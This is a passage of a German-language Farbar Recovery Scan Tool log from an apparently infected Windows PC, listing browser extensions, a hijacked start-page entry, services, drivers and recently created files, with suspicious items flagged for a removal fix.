CHR Extension: (Docs) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\aohghmighlieiainnegkcijnfilokake [2017-05-30]
CHR Extension: (Google Drive) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-05-30]
CHR Extension: (YouTube) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-05-30]
CHR Extension: (Google Mail) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-05-30]
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bpegkgagfojjbcpkihigfmkojdmmimdf] - <kein Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [ehgldbbpchgpcfagfpfjgoomddhccfgh] - <kein Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe <==== ACHTUNG

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S4 AppleAppSvc; C:\ProgramData\Apple\Temp\upgrade.ini:ad [199682 ] () [Datei ist nicht signiert] <==== ACHTUNG
S4 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [Datei ist nicht signiert]
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: <公司名>) [Datei ist nicht signiert] <==== ACHTUNG
S4 DbxSvc; C:\Windows\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101528 2017-05-31] () <==== ACHTUNG
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [365048 2016-10-07] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [387144 2016-02-04] ()
S2 MCSvc; C:\Windows\System32\svchost.exe [38792 2014-11-21] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
S2 MCSvc; C:\Windows\SysWOW64\svchost.exe [33088 2014-11-21] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
R2 MVCSrv; C:\ProgramData\Package Cache\{2A002F88-FD5D-379B-A350-A25D84AF128B}v14.0.25420\packages\VisualC_D14\VC_IDE.Base\VC_IDE_Base.dll [105984 2017-03-28] () [Datei ist nicht signiert]
S4 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) <==== ACHTUNG
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [665768 2016-11-16] (Enigma Software Group USA, LLC.)
S4 srcsrv; C:\Windows\src_srv\winsrcsrv.exe [17920 2017-05-29] () [Datei ist nicht signiert]
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
S4 SysLinkMapper; C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412\winnetsvces.exe [9216 2017-04-18] () [Datei ist nicht signiert]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10888944 2017-04-25] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
R2 WinSAPSvc; C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [Datei ist nicht signiert] <==== ACHTUNG
S2 ZbezjService; C:\Windows\SysWOW64\srvany.exe [8192 2003-04-18] () [Datei ist nicht signiert]
S2 3DM; C:\Users\Nick Schuster\AppData\Local\3DM\Kitty.dll [X] <==== ACHTUNG
S4 KingoSoftService; C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe "C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\checkupdate.exe"
S4 Kitty; C:\Users\Nick Schuster\AppData\Local\Kitty\Kitty.dll [X] <==== ACHTUNG
S2 kivojebi; C:\Program Files (x86)\0D8F6370-1479488272-81E4-3884-0071C2420BD3\kns20F0.tmp [X]
S4 Recover; C:\Program Files\Uninstall Information\FHND4RB6YGFG69477PK1CJU4XT48RPI\Odgt'YA#3N.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 DFX11_1; C:\Windows\system32\drivers\dfx11_1x64.sys [28008 2015-08-31] (Windows (R) Win 7 DDK provider)
S3 DFX12; C:\Windows\system32\drivers\dfx12x64.sys [29688 2015-11-12] (Windows (R) Win 7 DDK provider)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2017-05-07] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2017-05-07] (Disc Soft Ltd)
S3 dtproscsibus; C:\Windows\System32\drivers\dtproscsibus.sys [30264 2017-05-25] (Disc Soft Ltd)
S3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [16432 2016-11-16] (Enigma Software Group USA, LLC.)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-11-23] ()
R3 iaLPSS_GPIO; C:\Windows\System32\drivers\iaLPSS_GPIO.sys [35832 2014-06-03] (Intel Corporation)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3526400 2017-03-09] (Intel Corporation)
S3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [425216 2016-05-25] (Realsil Semiconductor Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [394296 2017-05-07] (Duplex Secure Ltd.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [51712 2011-02-18] (Apple, Inc.) [Datei ist nicht signiert]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)
S3 dbx; system32\DRIVERS\dbx.sys [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ACHTUNG

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Drei Monate: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-05 10:15 - 2017-06-05 10:16 - 00036672 _____ C:\Users\Nick Schuster\Desktop\FRST.txt
2017-06-05 10:14 - 2017-06-05 10:14 - 02433536 _____ (Farbar) C:\Users\Nick Schuster\Desktop\FRST64.exe
2017-06-03 18:29 - 2017-06-03 18:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Wargaming.net
2017-06-03 18:05 - 2017-06-03 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-4f25-0
2017-06-03 18:05 - 2017-06-03 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3735-1
2017-06-03 18:00 - 2017-06-03 18:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\NetCtl
2017-06-03 17:56 - 2017-06-03 19:08 - 00000000 ____D C:\Games
2017-06-03 14:01 - 2017-06-05 10:15 - 00000000 ____D C:\FRST
2017-06-02 18:05 - 2017-06-02 18:05 - 00004044 _____ C:\Windows\System32\Tasks\{25FE2E5B-9255-99F0-1368-8A42E54326C9}
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6921-1
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-2583-0
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}
2017-06-01 19:22 - 2017-06-01 19:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Applemy
2017-06-01 18:05 - 2017-06-01 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-7817-0
2017-06-01 18:05 - 2017-06-01 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3a25-1
2017-06-01 12:05 - 2017-06-01 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-0b25-1
2017-06-01 12:05 - 2017-06-01 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-07f7-0
2017-06-01 12:00 - 2017-06-01 12:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\glory
2017-06-01 00:19 - 2017-06-01 00:19 - 00001996 _____ C:\Windows\System32\Tasks\fyKiuMkkXh
2017-06-01 00:14 - 2017-06-01 00:19 - 00000002 _____ C:\END
2017-05-31 18:05 - 2017-05-31 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-7411-1
2017-05-31 18:05 - 2017-05-31 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-49f5-0
2017-05-31 13:53 - 2017-05-31 13:53 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Applemy
2017-05-31 13:52 - 2017-05-31 13:52 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-31 13:52 - 2017-05-31 13:52 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-31 13:46 - 2017-05-31 13:48 - 00000000 ____D C:\Program Files (x86)\Applemy
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{5dc62cb3-512c-0}
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{241B54D7-93B0-E37C-7209-B5C3B4A67434}
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1fc205d4-012c-1}
2017-05-31 12:05 - 2017-05-31 12:05 - 00023496 _____ C:\Windows\System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F}
2017-05-31 11:38 - 2017-05-31 11:38 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Obsidium
2017-05-31 11:36 - 2017-05-31 11:36 - 00000000 ____D C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412
2017-05-31 11:22 - 2017-05-31 11:22 - 00023032 _____ (Wiper Software) C:\Windows\system32\wiperrm.exe
2017-05-31 11:22 - 2017-05-31 11:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WiperSoft
2017-05-31 11:22 - 2017-05-31 11:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WiperSoft
2017-05-30 19:49 - 2017-05-30 19:51 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\{12A8CCFE-3C33-4995-BAD8-074E4C5B22FD}
2017-05-30 19:32 - 2017-05-31 13:53 - 00002326 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-05-30 19:32 - 2017-05-30 19:32 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Google
2017-05-30 19:23 - 2017-05-31 13:53 - 00002020 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-05-30 19:23 - 2017-05-30 19:23 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-05-30 13:59 - 2017-05-30 13:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Minerent
2017-05-30 13:58 - 2017-06-01 12:00 - 00000000 ____D C:\Program Files (x86)\Arucerther_
2017-05-30 13:58 - 2017-05-30 13:58 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-05-30 13:58 - 2017-05-30 13:58 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Users\Default\AppData\Roaming\Minerent
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Minerent
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Program Files (x86)\Arucerther
2017-05-30 13:56 - 2017-05-30 13:56 - 00006006 _____ C:\Windows\System32\Tasks\Coobeck Monitor
2017-05-30 13:56 - 2017-05-30 13:56 - 00000000 ____D C:\Users\Default\AppData\Local\Cerzaentfisuge
2017-05-30 13:56 - 2017-05-30 13:56 - 00000000 ____D C:\Users\Default User\AppData\Local\Cerzaentfisuge
2017-05-30 13:55 - 2017-05-30 13:55 - 00000000 ____D C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13
2017-05-30 13:55 - 2017-05-30 13:55 - 00000000 ____D C:\ProgramData\ddef39d292cf4b8ea43c256f14555ff3
2017-05-29 22:02 - 2017-05-29 22:02 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\FBTime
2017-05-29 22:01 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\943973b1-7343-1
2017-05-29 22:01 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\943973b1-6925-0
2017-05-29 22:01 - 2017-05-29 22:01 - 00003034 _____ C:\Windows\System32\Tasks\ttwifi
2017-05-29 22:00 - 2017-05-29 22:02 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AppTrailers
2017-05-29 22:00 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\gplyra
2017-05-29 22:00 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\gjtj1a4xugf
2017-05-29 22:00 - 2017-05-29 22:00 - 00016764 _____ C:\Windows\System32\Tasks\Quick Tharks Screen Saver
2017-05-29 22:00 - 2017-05-29 22:00 - 00003686 _____ C:\Windows\System32\Tasks\SoftUpgrade
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\devnull
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AdvinstAnalytics
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Program Files (x86)\SoftUpgrade
2017-05-29 21:59 - 2017-06-02 15:32 - 00003020 _____ C:\Windows\System32\Tasks\RunAtStartup
2017-05-29 21:59 - 2017-06-01 11:54 - 00000231 _____ C:\ServiceLog.txt
2017-05-29 21:59 - 2017-05-29 22:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck
2017-05-29 21:59 - 2017-05-29 22:01 - 00000000 ____D C:\Windows\src_srv
2017-05-29 21:59 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\yxuuo1zrzz4
2017-05-29 21:59 - 2017-05-29 22:00 - 00000000 ____D C:\Program Files (x86)\ProxyGate
2017-05-29 21:59 - 2017-05-29 21:59 - 00006038 _____ C:\Windows\System32\Tasks\Gerfety Renew
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\s0ac4g0fkg0
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Draveingplererward
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Program Files (x86)\Prfasaretaly
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Program Files (x86)\pccleanplus
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Babylon
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Babylon
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\ProgramData\Babylon
2017-05-26 18:05 - 2017-05-26 18:05 - 00000000 ____D C:\ProgramData\Electronic Arts
2017-05-26 17:40 - 2017-05-26 17:40 - 00000295 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Papierkorb.lnk
2017-05-26 09:40 - 2017-05-31 13:45 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\terana
2017-05-25 15:34 - 2017-05-25 15:36 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Pro
2017-05-25 15:34 - 2017-05-25 15:34 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtproscsibus.sys
2017-05-25 15:33 - 2017-05-25 15:33 - 00000000 ____D C:\ProgramData\DAEMON Tools Pro
2017-05-23 15:44 - 2017-04-27 15:11 - 00678592 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2017-05-23 15:44 - 2017-04-27 15:10 - 00536768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:11 - 00869568 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:10 - 00875712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2017-05-23 15:42 - 2017-04-06 19:37 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-23 15:42 - 2017-04-06 19:16 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\wpd_ci.dll
2017-05-23 15:42 - 2017-04-06 18:50 - 01436672 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00434688 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-23 15:42 - 2017-04-06 18:35 - 01362432 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2017-05-23 15:42 - 2017-04-06 18:15 - 00358912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-05-23 15:42 - 2017-04-06 17:44 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2017-05-23 15:42 - 2017-04-02 16:49 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2017-05-23 15:42 - 2017-04-02 15:40 - 02013016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-05-22 21:24 - 2017-05-22 21:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-18 22:17 - 2017-05-18 22:17 - 01499368 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2017-05-18 22:17 - 2017-05-18 22:17 - 00716880 _____ (Microsoft Corporation) C:\Windows\system32\WinUSBCoInstaller.dll
2017-05-18 22:17 - 2017-05-18 22:17 - 00166288 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudmdm.sys
2017-05-18 22:17 - 2017-05-18 22:17 - 00131984 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudbus.sys
2017-05-18 17:00 - 2017-05-22 17:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CSHMDR
2017-05-15 16:30 - 2017-05-17 14:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CWASRE
2017-05-15 00:05 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\f9d60eee-68a5-1
2017-05-15 00:05 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\f9d60eee-5f71-0
2017-05-14 16:16 - 2017-05-23 15:34 - 00000000 _____ C:\Windows\SysWOW64\1
2017-05-14 12:05 - 2017-05-14 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4cc1-0
2017-05-14 12:05 - 2017-05-14 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4593-1
2017-05-13 20:17 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1aa64fd2-712c-1}
2017-05-13 20:17 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{02a407e1-212c-0}
2017-05-12 18:05 - 2017-05-12 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-5ad5-1
2017-05-12 18:05 - 2017-05-12 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ae5-0
2017-05-11 18:05 - 2017-05-11 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6671-0
2017-05-11 18:05 - 2017-05-11 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6115-1
2017-05-11 15:23 - 2017-05-11 15:23 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 15:22 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-11 15:22 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 14:18 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-11 14:18 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-11 14:18 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-11 14:18 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-11 14:18 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-11 14:18 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-11 14:18 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-11 14:18 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-11 14:18 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2017-05-11 14:18 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-11 14:18 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-11 14:18 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-11 14:18 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-11 14:18 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-11 14:18 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-11 14:18 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-11 14:18 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2017-05-11 14:18 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-11 14:18 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-11 14:18 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-11 14:18 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-11 14:18 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
